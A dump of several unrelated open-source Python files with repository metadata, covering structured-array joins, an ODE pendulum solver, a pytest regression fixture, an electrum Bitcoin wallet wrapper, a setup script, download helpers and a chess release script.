Horizontally stack a sequence of numpy ndarrays with structured dtypes
Analog of numpy.hstack for recarrays.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.colstack` which uses
:func:`tabular.tabarray.tab_colstack`.
**Parameters**
**seq** : sequence of numpy ndarray with structured dtype
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['first','drop','abort','rename']
Denotes how to proceed if when multiple recarrays share the
same column name:
* if `mode` == ``first``, take the column from the first
recarray in `seq` containing the shared column name.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack share column names; this is the
default mode.
* elif `mode` == ``drop``, drop any column that shares
its name with any other column among the sequence of
recarrays.
* elif `mode` == ``rename``, for any set of all columns
sharing the same name, rename all columns by appending
an underscore, '_', followed by an integer, starting
with '0' and incrementing by 1 for each subsequent
column.
**Returns**
**out** : numpy ndarray with structured dtype
Result of horizontally stacking the arrays in `seq`.
**See also:** `numpy.hstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.hstack.html>`_.
"""
assert mode in ['first','drop','abort','rename'], \
'mode argument must take on value "first","drop", "rename", or "abort".'
AllNames = utils.uniqify(utils.listunion(
[list(l.dtype.names) for l in seq]))
NameList = [(x, [i for i in range(len(seq)) if x in seq[i].dtype.names])
for x in AllNames]
Commons = [x[0] for x in NameList if len(x[1]) > 1]
if len(Commons) > 0 or mode == 'first':
if mode == 'abort':
raise ValueError('There are common column names with differing ' +
'values in the columns')
elif mode == 'drop':
Names = [(L[0], x,x) for (x, L) in NameList if x not in Commons]
elif mode == 'rename':
NameDict = dict(NameList)
Names = utils.listunion([[(i,n,n) if len(NameDict[n]) == 1 else \
(i,n,n + '_' + str(i)) for n in s.dtype.names] \
for (i,s) in enumerate(seq)])
else:
Names = [(L[0], x,x) for (x, L) in NameList]
if returnnaming:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2]),Names
else:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2])
def join(L, keycols=None, nullvals=None, renamer=None,
returnrenaming=False, Names=None):
"""
Combine two or more numpy ndarray with structured dtype on common key
column(s).
Merge a list (or dictionary) of numpy ndarray with structured dtype, given
by `L`, on key columns listed in `keycols`.
This function is actually a wrapper for
:func:`tabular.spreadsheet.strictjoin`.
The ``strictjoin`` function has a few restrictions, and this ``join``
function will try to ensure that they are satisfied:
* each element of `keycol` must be a valid column name in `X`
and each array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
values in `A[col]` must be unique, -- and same for `X[col]`.
(Actually this uniqueness doesn't have to hold for the first tabarray
in L, that is, L[0], but must for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renamer** : function, optional
A function for renaming overlapping non-key column names
among the numpy recarrays to merge.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**returnrenaming** : Boolean, optional
Whether to return the result of the `renamer` function.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Names**: list of strings:
If `L` is a list, than names for elements of `L` can be
specified with `Names` (without losing the ordering as you
would if you did it with a dictionary).
`len(L)` must equal `len(Names)`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**renaming** : dictionary of dictionaries, optional
The result returned by the `renamer` function. Returned
only if `returnrenaming == True`.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**See Also:**
:func:`tabular.spreadsheet.strictjoin`
"""
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if not keycols:
keycols = utils.listintersection([a.dtype.names for a in LL])
if len(keycols) == 0:
raise ValueError('No common column names found.')
keycols = [l for l in keycols if all([a.dtype[l] == LL[0].dtype[l]
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with identical datatypes found.')
keycols = [l for l in keycols if all([isunique(a[keycols])
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with unique value sets in all arrays to be '
'merged, were found.')
else:
print('Inferring keycols to be:', keycols)
elif isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
renaming = {}
if len(commons) > 0:
print 'common attributes, forcing a renaming ...'
if renamer == None:
print('Using default renamer ...')
renamer = DEFAULT_RENAMER
renaming = renamer(L, Names=Names)
if not RenamingIsInCorrectFormat(renaming, L, Names=Names):
print('Renaming from specified renamer is not in correct format,'
'using default renamer instead ...')
renaming = DEFAULT_RENAMER(L, Names = Names)
NewNames = [[l if l not in renaming[k].keys() else renaming[k][l]
for l in ll.dtype.names] for (k, ll) in zip(Names, LL)]
if set(Commons(NewNames)).difference(keycols):
raise ValueError('Renaming convention failed to produce '
'separated names.')
Result = strictjoin(L, keycols, nullvals, renaming, Names=Names)
if returnrenaming:
return [Result, renaming]
else:
if renaming:
print('There was a nontrivial renaming, to get it set '
'"returnrenaming = True" in keyword to join function.')
return Result
def strictjoin(L, keycols, nullvals=None, renaming=None, Names=None):
"""
Combine two or more numpy ndarray with structured dtypes on common key
column(s).
Merge a list (or dictionary) of numpy arrays, given by `L`, on key
columns listed in `keycols`.
The ``strictjoin`` assumes the following restrictions:
* each element of `keycol` must be a valid column name in `X` and each
array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
values in `A[col]` must be unique, e.g. no repeats of values -- and
same for `X[col]`. (Actually, the uniqueness criterion need not hold
to the first tabarray in L, but first for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
For a wrapper that attempts to meet these restrictions, see
:func:`tabular.spreadsheet.join`.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renaming** : dictionary of dictionaries, optional
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
For example, the result returned by:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**See Also:**
:func:`tabular.spreadsheet.join`
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
assert all([set(keycols) <= set(l.dtype.names) for l in LL]), \
('keycols,', str(keycols),
', must be valid column names in all arrays being merged.')
assert all([isunique(l[keycols]) for l in LL[1:]]), \
('values in keycol columns,', str(keycols),
', must be unique in all arrays being merged.')
if renaming == None:
renaming = {}
assert RenamingIsInCorrectFormat(renaming, L, Names=Names), \
'renaming is not in proper format ... '
L = dict([(k,ll.copy()) for (k,ll) in zip(Names,LL)])
LL = L.values()
for i in Names:
l = L[i]
l.dtype = np.dtype(l.dtype.descr)
if i in renaming.keys():
for k in renaming[i].keys():
if k not in keycols:
renamecol(L[i], k, renaming[i][k])
l.sort(order = keycols)
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
assert len(commons) == 0, ('The following (non-keycol) column names '
'appear in more than on array being merged:', str(commons))
Result = colstack([(L[Names[0]][keycols])[0:0]] +
[deletecols(L[k][0:0], keycols) \
for k in Names if deletecols(L[k][0:0], keycols) != None])
PL = powerlist(Names)
ToGet = utils.listunion([[p for p in PL if len(p) == k]
for k in range(1, len(Names))]) + [PL[-1]]
for I in ToGet[::-1]:
Ref = L[I[0]][keycols]
for j in I[1:]:
if len(Ref) > 0:
Ref = Ref[fast.recarrayisin(Ref, L[j][keycols], weak=True)]
else:
break
if len(Ref) > 0:
D = [fast.recarrayisin(L[j][keycols], Ref, weak=True) for j in I]
Ref0 = L[I[0]][keycols][D[0]]
Reps0 = np.append(np.append([-1],
(Ref0[1:] != Ref0[:-1]).nonzero()[0]),[len(Ref0)-1])
Reps0 = Reps0[1:] - Reps0[:-1]
NewRows = colstack([Ref0] +
[deletecols(L[j][D[i]], keycols).repeat(Reps0) if i > 0 else
deletecols(L[j][D[i]], keycols) for (i, j) in enumerate(I)
if deletecols(L[j][D[i]], keycols) != None])
for (i,j) in enumerate(I):
L[j] = L[j][np.invert(D[i])]
Result = rowstack([Result, NewRows], mode='nulls',
nullvals=nullvals)
return Result
def RenamingIsInCorrectFormat(renaming, L, Names=None):
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
return isinstance(renaming, dict) and \
set(renaming.keys()) <= set(Names) and \
all([isinstance(renaming[k],dict) and
set(renaming[k].keys()) <=
set(LL[Names.index(k)].dtype.names) for k in renaming.keys()])
def DEFAULT_RENAMER(L, Names=None):
"""
Renames overlapping column names of numpy ndarrays with structured dtypes
Rename the columns by using a simple convention:
* If `L` is a list, it will append the number in the list to the key
associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the overlapping
columns from that array.
Default renamer function used by :func:`tabular.spreadsheet.join`
**Parameters**
**L** : list or dictionary
Numpy recarrays with columns to be renamed.
**Returns**
**D** : dictionary of dictionaries
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
commons = Commons([l.dtype.names for l in LL])
D = {}
for (i,l) in zip(Names, LL):
d = {}
for c in commons:
if c in l.dtype.names:
d[c] = c + '_' + str(i)
if d:
D[i] = d
return D
def Commons(ListOfLists):
commons = []
for i in range(len(ListOfLists)):
for j in range(i+1, len(ListOfLists)):
commons.extend([l for l in ListOfLists[i] if l in ListOfLists[j]])
return commons
def powerlist(S):
if len(S) > 0:
Sp = powerlist(S[:-1])
return Sp + [x + [S[-1]] for x in Sp]
else:
return [[]]
def isunique(col):
[D,s] = fast.recarrayuniqify(col)
return len(D.nonzero()[0]) == len(col) | mit | -489,199,996,321,512,960 | 34.931533 | 92 | 0.546152 | false |
KiMiralles/Python-Learning | Computational Physics Newman/Book Resources/bulirsch.py | 1 | 1824 | from math import sin,pi
from numpy import empty,array,arange
from pylab import plot,show
g = 9.81
l = 0.1
theta0 = 179*pi/180
a = 0.0
b = 10.0
N = 100 # Number of "big steps"
H = (b-a)/N # Size of "big steps"
delta = 1e-8 # Required position accuracy per unit time
def f(r):
theta = r[0]
omega = r[1]
ftheta = omega
fomega = -(g/l)*sin(theta)
return array([ftheta,fomega],float)
tpoints = arange(a,b,H)
thetapoints = []
r = array([theta0,0.0],float)
# Do the "big steps" of size H
for t in tpoints:
thetapoints.append(r[0])
# Do one modified midpoint step to get things started
n = 1
r1 = r + 0.5*H*f(r)
r2 = r + H*f(r1)
# The array R1 stores the first row of the
# extrapolation table, which contains only the single
# modified midpoint estimate of the solution at the
# end of the interval
R1 = empty([1,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*H*f(r2))
# Now increase n until the required accuracy is reached
error = 2*H*delta
while error>H*delta:
n += 1
h = H/n
# Modified midpoint method
r1 = r + 0.5*h*f(r)
r2 = r + h*f(r1)
for i in range(n-1):
r1 += h*f(r2)
r2 += h*f(r1)
# Calculate extrapolation estimates. Arrays R1 and R2
# hold the two most recent lines of the table
R2 = R1
R1 = empty([n,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*h*f(r2))
for m in range(1,n):
epsilon = (R1[m-1]-R2[m-1])/((n/(n-1))**(2*m)-1)
R1[m] = R1[m-1] + epsilon
error = abs(epsilon[0])
# Set r equal to the most accurate estimate we have,
# before moving on to the next big step
r = R1[n-1]
# Plot the results
plot(tpoints,thetapoints)
plot(tpoints,thetapoints,"b.")
show()
| gpl-3.0 | 7,120,225,636,442,674,000 | 23.648649 | 62 | 0.565241 | false |
ESSS/pytest-regressions | src/pytest_regressions/data_regression.py | 1 | 3451 | from functools import partial
import yaml
from pytest_regressions.common import Path, check_text_files, perform_regression_check
class DataRegressionFixture:
"""
Implementation of `data_regression` fixture.
"""
def __init__(self, datadir, original_datadir, request):
"""
:type datadir: Path
:type original_datadir: Path
:type request: FixtureRequest
"""
self.request = request
self.datadir = datadir
self.original_datadir = original_datadir
self.force_regen = False
def check(self, data_dict, basename=None, fullpath=None):
"""
Checks the given dict against a previously recorded version, or generate a new file.
:param dict data_dict: any yaml serializable dict.
:param str basename: basename of the file to test/record. If not given the name
of the test is used.
Use either `basename` or `fullpath`.
:param str fullpath: complete path to use as a reference file. This option
will ignore ``datadir`` fixture when reading *expected* files but will still use it to
write *obtained* files. Useful if a reference file is located in the session data dir for example.
``basename`` and ``fullpath`` are exclusive.
"""
__tracebackhide__ = True
def dump(filename):
"""Dump dict contents to the given filename"""
import yaml
dumped_str = yaml.dump_all(
[data_dict],
Dumper=RegressionYamlDumper,
default_flow_style=False,
allow_unicode=True,
indent=2,
encoding="utf-8",
)
with filename.open("wb") as f:
f.write(dumped_str)
perform_regression_check(
datadir=self.datadir,
original_datadir=self.original_datadir,
request=self.request,
check_fn=partial(check_text_files, encoding="UTF-8"),
dump_fn=dump,
extension=".yml",
basename=basename,
fullpath=fullpath,
force_regen=self.force_regen,
)
# non-PEP 8 alias used internally at ESSS
Check = check
class RegressionYamlDumper(yaml.SafeDumper):
"""
Custom YAML dumper aimed for regression testing. Differences to usual YAML dumper:
* Doesn't support aliases, as they produce confusing results on regression tests. The most
definitive way to get rid of YAML aliases in the dump is to create an specialization that
never allows aliases, as there isn't an argument that offers same guarantee
(see http://pyyaml.org/ticket/91).
"""
def ignore_aliases(self, data):
return True
@classmethod
def add_custom_yaml_representer(cls, data_type, representer_fn):
"""
Add custom representer to regression YAML dumper. It is polymorphic, so it works also for
subclasses of `data_type`.
:param type data_type: Type of objects.
:param callable representer_fn: Function that receives ``(dumper, data)`` type as
argument and must must return a YAML-convertible representation.
"""
# Use multi-representer instead of simple-representer because it supports polymorphism.
yaml.add_multi_representer(
data_type, multi_representer=representer_fn, Dumper=cls
)
| mit | 7,882,442,899,186,516,000 | 33.858586 | 110 | 0.622718 | false |
Skynet2-0/Skynet2.0 | agent/Wallet.py | 1 | 4754 | """
Created on Apr 26, 2016
@author: niels
"""
from subprocess import PIPE, STDOUT
from BogusFormBuilder import BogusFormBuilder
import subprocess
import re
import os
import time
import sys
import pexpect
class Wallet(object):
"""
This class will manage the bitcoins going in and out off the agent.
"""
def __init__(self):
""" Constructor. """
output = pexpect.run('electrum listaddresses')
print(output)
pattern = re.compile(r'\[\W*"[A-z0-9]+"\W*\]') #the specific output for electrum if 1 adress exists
print(pattern.search(output))
if(pattern.search(output)):
#if a wallet exists, initialize that one
print('using already existing wallet')
else:
self._create_wallet()
subprocess.call(['electrum', 'daemon', 'start'])
def _answer_prompt(self, child, answer):
"""
Wait for a prompt, then send the answer. Answering with '' is the same as no answer
child -- a result from pexpect.spawn and is thus of the pexpect.spawn class.
"""
#wait for prompt, then send answer
child.waitnoecho()
child.sendline(answer)
try:
child.read()
except:
pass #somethimes no output is generated, and eof would cash read...
def _create_wallet(self):
print('did not find an existing wallet, creating a new one')
#ensure the daemon is stopped, as this causes path errors (mostly usefull for development)
pexpect.run('electrum daemon stop')
#build a new wallet if no wallet yet exists
walletpair=str(subprocess.check_output('python addrgen/addrgen.py',shell=True))
walletpair = re.split('\W+', walletpair)
self.address = walletpair[1]
self.privkey = walletpair[2]
print('created a wallet with address \''+self.address+'\' and privatekey \''+self.privkey+'\'')
child = pexpect.spawn('electrum', ['restore', self.privkey])
#respectively: use default password, use default fee (0.002), use default gap limit and give seed
self._answer_prompt(child, '')
#check if wallet was created succesfulyl
command = """electrum listaddresses"""
output = pexpect.run(command)
walletFinder = re.compile(r'\[\W*"([A-z0-9]+)"\W*\]')
result = walletFinder.search(output)
#This horrible feedback loop is here due to a quirk of electrum.
#Needs refactoring, but do not refactor without extensive testing (i.e. multiple vps all from clean install)
#Because electrum behaviour right after startup tends to differ from server to server (i suspect something to do wtih specs)
try:
print result.group(1)
return result.group(1)
except:
return self._create_wallet()
# def __del__(self):
# '''
# clear up the electrum service
# '''
# subprocess.call(['electrum', 'daemon', 'stop'])
def balance(self):
"""
Return the balance of the Btc wallet (i.e. confirmed balance+unconfirmed balance).
"""
balancesheet = str(subprocess.check_output(['electrum', 'getbalance']))
return self.calculateBalance(balancesheet)
def calculateBalance(self, balancesheet):
"""
Given the output of electrum getbalance
calculates the actual balance.
"""
confirmedBalance = re.search('"confirmed": "([0-9.\-]+)"', balancesheet)
unconfirmedBalance = re.search('"unconfirmed": "([0-9.\-]+)"', balancesheet)
sum = 0.0
if confirmedBalance:
sum+=float(confirmedBalance.group(1))
if unconfirmedBalance:
sum+=float(unconfirmedBalance.group(1))
return sum
def canPay(self, amount, fee):
return float(amount)+float(fee)<=self.balance()
def payToAutomatically(self, address, amount):
"""
Make a payment using an automatically calculated fee.
address -- The address to transfer to.
amount -- The amount to transfer.
"""
if self.canPay(amount,'0.0'):
payment = str(subprocess.check_output(['electrum', 'payto', address, amount]))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
return True
return False
def send_everything_to(self, address):
"""
Transfers all available funds in the wallet to the specified address
address -- The address as string to transfer to
"""
payment = str(subprocess.check_output(['electrum', 'payto', str(address), '!']))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
def payTo(self, address, fee, amount):
"""
If funds allow, transfer amount in Btc to Address. With a fee for
processor.
address -- The address to pay to.
fee -- The fee to pay.
amount -- The amount to transfer.
"""
if self.canPay(amount, fee):
print(str(subprocess.call(['electrum', 'payto', '-f', fee, address, amount])))
| gpl-3.0 | 8,826,590,145,078,224,000 | 30.071895 | 126 | 0.689314 | false |
rabbitvcs/rabbitvcs | setup.py | 1 | 5870 | from __future__ import absolute_import
from __future__ import print_function
#!/usr/bin/env python
# If you didn't know already, this is a Python distutils setup script. It borrows
# heavily from Phatch's (see: http://photobatch.stani.be/).
#
# There's a lot of comments here (on purpose) so people can actually learn from
# this and don't have to figure out everything on their own.
#
# This setup script is used to build distribution specific packages.
#
# For more information see: http://docs.python.org/dist/dist.html
#
# TODO: this all feels just a little too shell scripty, refactoring it later
# might be a good idea.
# NOTES:
# System-wide directories:
# Scalable emblems go in: /usr/share/icons/hicolor/scalable/emblems
#
# User-specific directories:
# Scalable emblems go in: ~/.icons/hicolor/scalable
#
# Common directories
# See: http://standards.freedesktop.org/basedir-spec/basedir-spec-0.6.html
# Configuration information goes in: ~/.config/rabbitvcs/
# Data goes in: ~/.local/share/rabbitvcs
import sys
import os
import os.path
import subprocess
from distutils.core import setup
import distutils.sysconfig
PREFIX = sys.prefix
# If the user passed --prefix=... then use the new prefix
for c in sys.argv:
if c.startswith("--prefix="):
PREFIX = c.split("=", 1)[1].strip()
elif c == '--user':
PREFIX = os.path.expanduser("~/.local")
#==============================================================================
# Variables
#==============================================================================
# Some descriptive variables
# This will eventually be passed to the setup function, but we already need them
# for doing some other stuff so we have to declare them here.
name = "rabbitvcs"
version = "0.18"
description = "Easy version control"
long_description = """RabbitVCS is a set of graphical tools written to provide simple and straightforward access to the version control systems you use."""
author = "Adam Plumb"
author_email = "[email protected]"
url = "http://www.rabbitvcs.org"
license = "GNU General Public License version 2 or later"
#==============================================================================
# Paths
#==============================================================================
icon_theme_directory = "share/icons/hicolor"
locale_directory = "share/locale"
#==============================================================================
# Helper functions
#==============================================================================
def include_by_pattern(directory, directory_to_install, pattern):
files_to_include = []
for root, dirs, files in os.walk(directory):
for file in files:
if file.endswith(pattern):
files_to_include.append((
root.replace(directory, directory_to_install),
[os.path.join(root, file)]
))
return files_to_include
#==============================================================================
# Gather all the files that need to be included
#==============================================================================
# Packages
packages = []
for root, dirs, files in os.walk("rabbitvcs"):
if "__init__.py" in files:
packages.append(root.replace(os.path.sep, "."))
# Translation
translations = include_by_pattern("locale", locale_directory, ".mo")
# Icons
icons = include_by_pattern("data/icons/hicolor", icon_theme_directory, ".svg")
icons += include_by_pattern("data/icons/hicolor", icon_theme_directory, ".png")
# Config parsing specification
config_spec = [(
"share/rabbitvcs",
["rabbitvcs/util/configspec/configspec.ini"]
)]
# Documentation
documentation = [("share/doc/rabbitvcs", [
"AUTHORS",
"MAINTAINERS"
])]
# Save build information so we can access the prefix later
path = "rabbitvcs/buildinfo.py"
buildinfo = '''rabbitvcs_prefix = "%s"
icon_path = "%s/%s"
''' % (PREFIX, PREFIX, icon_theme_directory)
fh = open(path, "w")
fh.write(buildinfo)
fh.close()
#==============================================================================
# Ready to install
#==============================================================================
# Calling the setup function will actually install RabbitVCS and also creates
# an .egg-info file in /usr/lib/python<version>/site-packages/ or
# /usr/share/python-support/rabbitvcs when generating a Debian package.
dist = setup(
# The following arguments will be included in the .egg.info file,
# for a list of available arguments and their descriptions see:
# - http://docs.python.org/dist/module-distutils.core.html
name=name,
version=version,
description=description,
long_description=long_description,
author=author,
author_email=author_email,
url=url,
license=license,
# There are actually several arguments that are used to install files:
# - py_modules: installs specific modules to site-packages
# - packages: install complete packages (directories with an __init__.py
# file) into site-packages
# - data_files: any file you want, anywhere you want it
packages=packages,
package_data={
"rabbitvcs": [
# Include our GtkBuilder UI files right into the package
"ui/xml/*.xml",
"ui/xml/dialogs/*.xml"
]
},
data_files=translations + icons + documentation + config_spec
)
#
# Post installation
#
# Make sure the icon cache is deleted and recreated
if sys.argv[1] == "install":
if os.uname()[0] != 'Darwin':
print("Running gtk-update-icon-cache")
subprocess.Popen(
["gtk-update-icon-cache", os.path.join(PREFIX, icon_theme_directory)],
stdout=subprocess.PIPE
).communicate()[0]
| gpl-2.0 | -7,958,066,994,226,009,000 | 33.127907 | 158 | 0.584838 | false |
hkkwok/MachOTool | utils/progress_indicator.py | 1 | 1267 | import sys
import datetime
class ProgressIndicator(object):
ENABLED = True
RECORDS = list()
def __init__(self, prompt, frequency):
self._display(prompt)
self._record(prompt + 'start')
self.prompt = prompt
self.frequency = frequency
self.count = 0
def click(self):
if (self.count % self.frequency) == 0:
self._display('.')
self.count += 1
def done(self):
self._display('\n')
self._record(self.prompt + 'done (%d entries)' % self.count)
@classmethod
def display(cls, fmt, *args):
if cls.ENABLED:
if len(args) == 0:
output = fmt
else:
output = fmt % tuple(args)
cls._display(output)
cls._record(output)
@classmethod
def _display(cls, output):
if cls.ENABLED:
sys.stdout.write(output)
sys.stdout.flush()
@classmethod
def _record(cls, event):
cls.RECORDS.append((datetime.datetime.now(), event))
@classmethod
def clear(cls):
cls.RECORDS = list()
@classmethod
def dump_records(cls):
for (timestamp, event) in cls.RECORDS:
print '%s: %s' % (str(timestamp), event)
| apache-2.0 | 1,150,852,479,338,861,800 | 23.365385 | 68 | 0.539069 | false |
minzhangcheng/MPL | MPL/Network/Download.py | 1 | 3810 | # ############################################################################
#
# Copyright (C) 2015 Minzhang Cheng
# Contact: [email protected]
#
# This file is part of the Minzhang's Python Library, a Python library with many utils by Minzhang Cheng.
#
# GNU Lesser General Public License Usage
# This file may be used under the terms of the GNU Lesser General Public
# License version 3 as published by the Free Software Foundation and
# appearing in the file LICENSE included in the packaging of this file.
# Please review the following information to ensure the GNU Lesser
# General Public License version 3 requirements will be met:
# http://www.gnu.org/licenses/gpl-3.0.html
#
# ############################################################################
import __future__
import ftplib
import requests
def ftpDownload(url, path, filename='', user='anonymous', password=''):
"""
##############################################################################
#
# ftpDownload(url, URL of ftp, pointing to a file
# path, The path to store downloaded file
# filename='', Filename, default to use the original name from ftp server
# user='anonymous', FTP user, default to use anonymous mode
# password='') FTP password, default to use anonymous mode
#
# Download one file from ftp server, with url like
# [ftp://][user:password]@ftphost[:port]/[path/]filename
#
##############################################################################
"""
url = url.strip(' \t\n')
if url[:6] == 'ftp://':
url = url[6:]
at = url.find('@')
if at >= 0:
(ftpUser, host) = url.rsplit('@', 1)
user = ftpUser
sep = ftpUser.find(':')
if sep >= 0:
(user, password) = ftpUser.split(':', 1)
else:
host = url
(host, ftpPath) = host.split('/', 1)
host = host.split(':')
if len(host) == 2:
port = host[1]
host = host[0]
else:
port = 21
host = host[0]
sep = ftpPath.find('/')
if sep >= 0:
(ftpPath, name) = ftpPath.rsplit('/', 1)
else:
name = ftpPath
ftpPath = ''
if path[-1] != '/':
path += '/'
if filename == '':
filename = path + name
else:
filename = path + filename
ftp = ftplib.FTP()
ftp.connect(host, port)
ftp.login(user, password)
if ftpPath != '':
ftp.cwd(ftpPath)
outFile = open(filename, 'wb')
ftp.retrbinary('RETR %s' % name, outFile.write)
ftp.quit()
outFile.close()
return True
def httpDownload(url, path, filename=''):
"""
Download one file from http server.
httpDownload(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name
from http server
"""
if path[-1] not in '/':
path += '/'
if len(filename) == 0:
file = url.rsplit('/', 1)[-1]
file = path + file
else:
file = path + filename
req = requests.get(url)
outFile = open(file, 'wb')
outFile.write(req.content)
outFile.close()
return True
def download(url, path, filename=''):
"""
Download one file from remote server.
download(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name from
remote server
"""
if url[:6] == 'ftp://':
return ftpDownload(url, path, filename)
else:
return httpDownload(url, path, filename) | lgpl-3.0 | 6,221,154,197,156,404,000 | 30.237705 | 105 | 0.505512 | false |
denim2x/python-chess | release.py | 1 | 5726 | #!/usr/bin/python3
# Helper script to create and publish a new python-chess release.
import os
import chess
import sys
import zipfile
import textwrap
import configparser
import requests
import bs4
def system(command):
if 0 != os.system(command):
sys.exit(1)
def check_git():
print("--- CHECK GIT ----------------------------------------------------")
system("git diff --exit-code")
def test():
print("--- TEST ---------------------------------------------------------")
system("python2 test.py")
system("python3 test.py")
def doctest():
print("--- DOCTEST ------------------------------------------------------")
system("python2 -m doctest README.rst")
system("python3 -m doctest README.rst")
def check_changelog():
print("--- CHECK CHANGELOG ----------------------------------------------")
with open("CHANGELOG.rst", "r") as changelog_file:
changelog = changelog_file.read()
if "Upcoming in the next release" in changelog:
print("Found: Upcoming in the next release")
sys.exit(1)
tagname = "v{0}".format(chess.__version__)
if tagname not in changelog:
print("Not found: {0}".format(tagname))
sys.exit(1)
def check_docs():
print("--- CHECK DOCS ---------------------------------------------------")
system("python3 setup.py --long-description | rst2html --strict > /dev/null")
def benchmark():
print("--- BENCHMARK ----------------------------------------------------")
system("python2 benchmark.py")
system("python3 benchmark.py")
def tag_and_push():
print("--- TAG AND PUSH -------------------------------------------------")
tagname = "v{0}".format(chess.__version__)
release_filename = "release-{0}.txt".format(tagname)
if not os.path.exists(release_filename):
print(">>> Creating {0} ...".format(release_filename))
first_section = False
prev_line = None
with open(release_filename, "w") as release_txt, open("CHANGELOG.rst", "r") as changelog_file:
headline = "python-chess {0}".format(tagname)
release_txt.write(headline + os.linesep)
for line in changelog_file:
if not first_section:
if line.startswith("-------"):
first_section = True
else:
if line.startswith("-------"):
break
else:
if not prev_line.startswith("------"):
release_txt.write(prev_line)
prev_line = line
with open(release_filename, "r") as release_txt:
release = release_txt.read().strip() + os.linesep
print(release)
with open(release_filename, "w") as release_txt:
release_txt.write(release)
guessed_tagname = input(">>> Sure? Confirm tagname: ")
if guessed_tagname != tagname:
print("Actual tagname is: {0}".format(tagname))
sys.exit(1)
